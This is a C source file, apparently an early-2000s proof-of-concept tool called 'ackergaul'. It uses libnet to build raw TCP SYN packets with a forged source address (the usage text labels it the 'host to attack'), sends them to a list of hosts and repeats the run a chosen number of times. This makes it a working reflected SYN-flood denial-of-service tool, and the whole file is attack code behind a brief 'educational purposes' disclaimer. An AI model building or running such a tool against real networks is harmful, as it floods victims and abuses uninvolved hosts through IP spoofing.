/* ackergaul.c, v1.0 03.09.04
 * author: b at swag.at
 * copyright: b at swag.at
 *
 * !!this is a proof of concept code!!
 *
 * just for educational purposes, don't
 * make me responsible if you get in trouble.
 * juse it at your own risk!
 */ 

#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF_LEN   20
#define ADDR_LEN  25

void usage (char *name);

int main (int argc, char **argv) {

    libnet_t *session = NULL;
    libnet_ptag_t ip_tag, tcp;
    
    u_long src_ip = 0, dst_ip = 0;
    u_short sport = 0, dport = 0;
    u_short silent = 0;
    
    struct libnet_stats stats;
    char errbuf [LIBNET_ERRBUF_SIZE], buf [ADDR_LEN];
    char *device = NULL, *inputfile = NULL;

    int c, repeat = -1, i = 0;

    FILE *hostlist = NULL;



    if (argc < 13 || argc > 14) {
       usage (argv [0]);
       exit (EXIT_FAILURE);
    }

    while ((c = getopt (argc, argv, "i:l:t:s:d:r:S")) != EOF) {
          
	  switch (c) {
                case 'i': if ((device = (char *) malloc (strlen (optarg) * sizeof (char))) == NULL) {
			     fprintf (stderr, "Unable to allocate memory for device %s", optarg);
			     exit (EXIT_FAILURE);
			  }

			  strncpy (device, optarg, strlen (optarg)); 
			break; 

                case 'l': if ((inputfile = (char *) malloc (strlen (optarg) * sizeof (char))) == NULL) {
                             fprintf (stderr, "Unable to allocate memory for inputlist %s", optarg);
			     exit (EXIT_FAILURE);
                          }
			  
			  strncpy (inputfile, optarg, strlen (optarg));
                        break;

                case 'S': silent = 1; 
                        break;

                case 't': src_ip = libnet_name2addr4 (session, optarg, LIBNET_RESOLVE);
                          if (src_ip == -1) {
                             fprintf (stderr, "Source IP not valid: %s\n", optarg);
                             exit (EXIT_FAILURE);
                          }
                        break;

		case 's': sport = atoi (optarg); 
		        break;

		case 'd': dport = atoi (optarg);
			break;

		case 'r': repeat = atoi (optarg);
                          if (repeat < 1) {
			     fprintf (stderr, "Wrong repeat value! Has to be 1 or higher\n");
			     exit (EXIT_FAILURE);
 			  }
  		        break;

                case '?': usage (argv [0]);
			  exit (EXIT_FAILURE);
 
                case ':': usage (argv [0]);
			  exit (EXIT_FAILURE);

                default: usage (argv [0]); 
                         exit (EXIT_FAILURE);
          }
    }

    if ((session = libnet_init (LIBNET_RAW4, device, errbuf)) == NULL) {
       fprintf (stderr, "libnet_init() error: %s", errbuf);
       exit (EXIT_FAILURE);
    }

    if ((hostlist = fopen (inputfile, "r")) == NULL) {
       fprintf (stderr, "fopen(%s) error\n", inputfile);
       exit (EXIT_FAILURE);
    }

    while (i < repeat) {

          while (fgets (buf, BUF_LEN, hostlist)) {

                tcp = ip_tag = LIBNET_PTAG_INITIALIZER; 
  	  	dst_ip = libnet_name2addr4 (session, buf, LIBNET_RESOLVE); 
          
	  	tcp = libnet_build_tcp (
                      sport,                           
                      dport,                          
		      0,				
		      0L,
		      TH_SYN,
		      1024,
		      0,
		      0,
                      LIBNET_TCP_H,                   
		      NULL,
                      0,                              
                      session,                        
                      tcp);                           
          
          	if (tcp == -1) {
             	   fprintf (stderr, "Can't build TCP header (port %d): %s\n", 
                           dport, libnet_geterror (session));

	     	   libnet_destroy (session);
	           exit (EXIT_FAILURE);
            	}

          	ip_tag = libnet_build_ipv4 (
                         LIBNET_IPV4_H + LIBNET_TCP_H,
                         0,                         
                         242,                       
                	 0,                         
                	 64,                        
                	 IPPROTO_TCP,               
                	 0,                         
                	 src_ip,                    
                	dst_ip,                    
                	NULL,                      
                        0,                         
                	session,                   
                  	0);                        
                
            	if (ip_tag == -1) {
                   fprintf (stderr, "Can't build IP header: %s\n",
                           libnet_geterror (session));

	           libnet_destroy (session);
	           exit (EXIT_FAILURE);
           	}

           	c = libnet_write (session); 
           
           	if (c == -1) {
                   fprintf(stderr, "Couldn't write packet to the wire biatch: %s\n",
                   libnet_geterror (session));
           	}
           	else if (!silent) { 
                        fprintf (stderr, ".");
           	}
          
	   	libnet_clear_packet (session);

    	  } //packetloop end
    
    	  rewind (hostlist); 
          i ++;
    } // repeatloop end

    if (!silent)
       printf ("\n");

    libnet_stats (session, &stats);
    printf ("Packets sent:  %ld\nPacket errors: %ld\n",
           stats.packets_sent, stats.packet_errors);

    libnet_destroy (session);
    return (EXIT_SUCCESS);
}


void usage (char *name) {
    
     fprintf (stderr, "Usage: %s:\n"
	    "-i interface\t\tInterface to use [eth0, ppp0...]\n"
            "-t ip\t\t\tSource IP address (host to attack)\n"
	    "-s port\t\t\tSource port\n"
	    "-d port\t\t\tDestination port\n"	
	    "-l <addrlist>\t\tList of destination IP's (check README for format)\n"
	    "-r <n>\t\t\trepeat packeting n times\n"
            "-S   \t\t\tSilent mode\n", name);
}


